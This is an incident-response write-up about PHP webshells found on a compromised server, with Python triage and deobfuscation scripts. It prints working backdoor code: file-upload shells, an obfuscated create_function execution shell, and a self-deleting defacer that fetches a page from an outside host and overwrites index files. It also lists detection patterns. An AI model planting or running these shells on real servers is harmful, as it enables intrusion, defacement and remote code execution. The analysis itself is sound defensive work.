This started when a domain could not be reached from abroad last night; after investigation:
1、Logging in to the server by IP: fine
2、Access from outside China is normal, access from inside China fails; suspected the domain was blocked (GFW),
3、Binding another domain to this IP works; binding a subdomain of this domain to this IP does not work; however, without the CDN in front it can be accessed normally
4、A while ago the platform sent an alert about a backdoor file, but I did not pay attention, assuming it was a leftover from my own debugging; logged in to take a look
Logged in to the server and ran chkrootkit and the Hema (河马) webshell scanner, plus
find ./ -name "*.php"
which turned up the following backdoors
Downloaded them locally and ran them through D盾 (D-Shield):
Now going through them one by one:
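chkrootkit, Hema and D-Shield did the scanning above. As an added example (not code from the original post), the following Python script is a small offline triage pass over a webroot: it walks the tree and flags script files by the indicators the samples on this page share, namely copy() of $_FILES, create_function, base64_decode, the "str"."_"."ro" / .="t13" rot13 trick, a variable-variable superglobal like ${$r(...)}, long hex literals, a remote file_get_contents, and unlink(__FILE__). The sample files it scans are constructed inline from the listings on this page; the indicator names, the extension list and the demo paths are my assumptions.

```python
import os
import re
import tempfile

# Indicator patterns drawn from the samples on this page. A hit is a reason
# to open the file, not proof that it is a backdoor.
INDICATORS = [
    ("upload-via-copy", re.compile(r"copy\s*\(\s*\$_FILES", re.I)),
    ("create_function", re.compile(r"create_function\s*\(", re.I)),
    ("base64_decode", re.compile(r"base64_decode\s*\(", re.I)),
    # literal str_rot13, or the split form  'ro';$r.='t13'  used by 683.php
    ("str_rot13", re.compile(r"str_rot13|'ro'\s*;\s*\$\w+\s*\.=\s*'t13'", re.I)),
    # ${$r('...')} : a superglobal name produced at run time
    ("variable-variable superglobal", re.compile(r"\$\{\s*\$\w+\s*\(", re.I)),
    ("hex-encoded string", re.compile(r"0x[0-9a-f]{16,}|(?:\\x[0-9a-f]{2}){8,}", re.I)),
    ("remote fetch to index", re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.I)),
    ("self-delete", re.compile(r"unlink\s*\(\s*__FILE__\s*\)", re.I)),
]

# Extensions the web server may still hand to PHP depending on its handler
# config, plus .bak, which is where functions.php.bak hid on this server.
# (Assumed list; extend it to match the host's actual handler config.)
SUSPECT_EXT = (".php", ".php5", ".phtml", ".phar", ".bak")


def scan_source(text):
    """Return the names of every indicator that fires on one file's content."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_tree(root):
    """Walk a webroot; map each relative path with at least one hit to its hits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(SUSPECT_EXT):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as f:
                found = scan_source(f.read())
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


# Constructed samples: fragments of the listings on this page plus one benign
# theme file and one non-script file that mentions an indicator.
SAMPLES = {
    "556.php": "<?php print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){"
               "if(@copy($_FILES[\"0\"][\"tmp_name\"],$_FILES[\"0\"][\"name\"]))"
               "{echo\"Y\";}else{echo\"N\";}}",
    "683.php": "<?php\n$r='str'.'_'.'ro';$r.='t13';if(!empty(${$r('_CB'.'FG')})){\n"
               "$m=$r('zq'.'5');$b=$r('onfr64_'.'qrpbqr');$f=$r('per'.'ngr_shapgvba');",
    "x.php5": "<?php $def = file_get_contents('http://zonehmirrors.org/defaced/2013/03/19/associapress.net');"
              " unlink(__FILE__);",
    "wp-content/themes/t/functions.php": "<?php function theme_setup() { add_theme_support('title-tag'); }",
    "readme.txt": "base64_decode( is mentioned here but this is not PHP",
}


def demo():
    """Write the constructed samples into a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as f:
                f.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, found in sorted(demo().items()):
        print(path, "->", ", ".join(found))
```

Run it against a copy of the webroot rather than the live one, and pair the hits with mtime and ownership (find -newer against a known-good file) to separate planted files from legitimate plugins that also call base64_decode.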
1、
Decode the characters in the array:
Or:
#coding:utf-8
import libnum
# The array holds a PHP function name as one big integer;
# libnum.n2s() turns the integer back into its byte string.
n = 0x66696c655f6765745f636f6e74656e7473
print(libnum.n2s(n))  # b'file_get_contents'
Running it gives a large webshell (大马):
2、K17.phtml
Source: https://github.com/bartblaze/PHP-backdoors/blob/master/Deobfuscated/k2ll33dShell_5a93b50b370effd9299866578426c5cb9ca161c7.php
3、x.php5
It contains a lot of content.....
<?php
// fetch the defacement page from the zone-h mirror
$def = file_get_contents('http://zonehmirrors.org/defaced/2013/03/19/associapress.net');
// derive the site's public_html directory from this file's own location
$p = explode('public_html',dirname(__FILE__));
$p = $p[0].'public_html';
if ($handle = opendir($p)) {
// overwrite every index file with the defacement page
$fp1 = @fopen($p.'/index.html','w+');
@fwrite($fp1, $def);
$fp1 = @fopen($p.'/index.php','w+');
@fwrite($fp1, $def);
$fp1 = @fopen($p.'/index.htm','w+');
@fwrite($fp1, $def);
echo 'Done';
}
closedir($handle);
// remove itself after defacing
unlink(__FILE__);
http://zonehmirrors.org/defaced/2013/03/19/associapress.net/ is a defacement page:
Found it on zone-h:
4、functions.php.bak
Contains an obvious backdoor:
5、210.php
if(isset($_POST['submit'])){
    // saves the uploaded file under its client-supplied name, next to the shell
    if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'OK';}else{echo'Not';}
}
echo'<form enctype="multipart/form-data" method="post"><input type="file" name="file"><input type="submit" name="submit" value="ucCI
6、556.php:
<?php
print_r(base64_decode('U0gzTExGMFVORA=='));   // prints the marker SH3LLF0UND
if($_POST){
    // any POST: drop the uploaded file "0" into the current directory under its own name
    if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}
}else{
    echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";
}
?>
The keyword SH3LLF0UND matches the decoded U0gzTExGMFVORA==; ran it through a search engine:
https://ctf.pediy.com/team-myctf-100029.htm
7、683.php
<?php
$r='str'.'_'.'ro';$r.='t13';if(!empty(${$r('_CB'.'FG')})){
$m=$r('zq'.'5');$b=$r('onfr64_'.'qrpbqr');$f=$r('per'.'ngr_shapgvba');
foreach(${$r('_C'.'BFG')}as$k=>$v)($m($k)==='c42ea979'.'ed982c0263243'
.'0e9e98a66d6'&&$ff=$f('',$b($v)))?$ff():'';}
Tidied up (the hash is the one from the obfuscated listing above, with its pieces joined):
<?php
if(!empty($_POST)){
    foreach($_POST as $k=>$v)
        // the parameter name must md5 to the hard-coded hash; the value is base64-encoded PHP
        ( md5($k)==='c42ea979ed982c02632430e9e98a66d6' && $ff=create_function('',base64_decode($v)) ) ? $ff() : '';
}
Usage: $k is the parameter name and $v the parameter value: the name must md5 to the hard-coded hash, and the value is the PHP code to run, base64-encoded; create_function() wraps it in an anonymous function that is called immediately.
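As an added example (not the author's code), the following Python statically undoes the layers in 683.php, which is what the tidied version above does by hand, and then mirrors the gate logic so that a candidate parameter name can be checked against the md5 without ever running the shell. The sample is the 683.php listing above embedded verbatim; the function names and the test payload are mine.

```python
import base64
import codecs
import hashlib
import re

# 683.php exactly as listed above, embedded so the script runs offline.
SAMPLE_683 = """<?php
$r='str'.'_'.'ro';$r.='t13';if(!empty(${$r('_CB'.'FG')})){
$m=$r('zq'.'5');$b=$r('onfr64_'.'qrpbqr');$f=$r('per'.'ngr_shapgvba');
foreach(${$r('_C'.'BFG')}as$k=>$v)($m($k)==='c42ea979'.'ed982c0263243'
.'0e9e98a66d6'&&$ff=$f('',$b($v)))?$ff():'';}
"""

# The md5 every POST parameter *name* is compared against (pieces joined).
HASH_683 = "c42ea979ed982c02632430e9e98a66d6"

CONCAT_RE = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")


def rot13(s):
    return codecs.decode(s, "rot_13")


def join_concats(src):
    """Fold 'a'.'b' (even across a newline) into 'ab' until nothing changes."""
    while True:
        new = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
        if new == src:
            return src
        src = new


def deobfuscate(src):
    """Statically undo the layers 683.php stacks up and return readable PHP."""
    src = join_concats(src)
    # $r='str_ro';$r.='t13';  -> the decoder is str_rot13; drop the assignment
    m = re.search(r"\$r='([^']*)';\$r\.='([^']*)';", src)
    if m is None or m.group(1) + m.group(2) != "str_rot13":
        raise ValueError("sample does not use the expected str_rot13 decoder")
    src = src[:m.start()] + src[m.end():]
    # $r('xyz')  -> the rot13-decoded literal
    src = re.sub(r"\$r\('([^']*)'\)", lambda mm: "'" + rot13(mm.group(1)) + "'", src)
    # ${'_POST'} -> $_POST (keep a space when a keyword such as "as" follows)
    src = re.sub(r"\$\{'(\w+)'\}(?=\w)", r"$\1 ", src)
    src = re.sub(r"\$\{'(\w+)'\}", r"$\1", src)
    # $m='md5'; ... $m($k) -> md5($k); the one-letter aliases are then dead
    for var, fn in re.findall(r"\$([a-z])='(\w+)';", src):
        src = src.replace("$%s='%s';" % (var, fn), "")
        src = src.replace("$%s(" % var, fn + "(")
    return src


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def encode_payload(php):
    """Encode PHP the way the operator must: base64 in the POST value."""
    return base64.b64encode(php.encode()).decode()


def backdoor_gate(post, hash_hex=HASH_683):
    """Mirror the deobfuscated loop without running PHP: the first POST field
    whose *name* md5s to hash_hex has its *value* base64-decoded and handed to
    create_function(). Returns that PHP source, or None if no field matches."""
    for name, value in post.items():
        if md5_hex(name) == hash_hex:
            return base64.b64decode(value).decode()
    return None


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_683))
```

Because only the md5 of the parameter name is stored, the shell's password can be recovered offline by feeding a wordlist through md5_hex() and comparing against HASH_683, and the same loop turns access logs into a detection: any POST to the file whose field name hashes to that value is the operator.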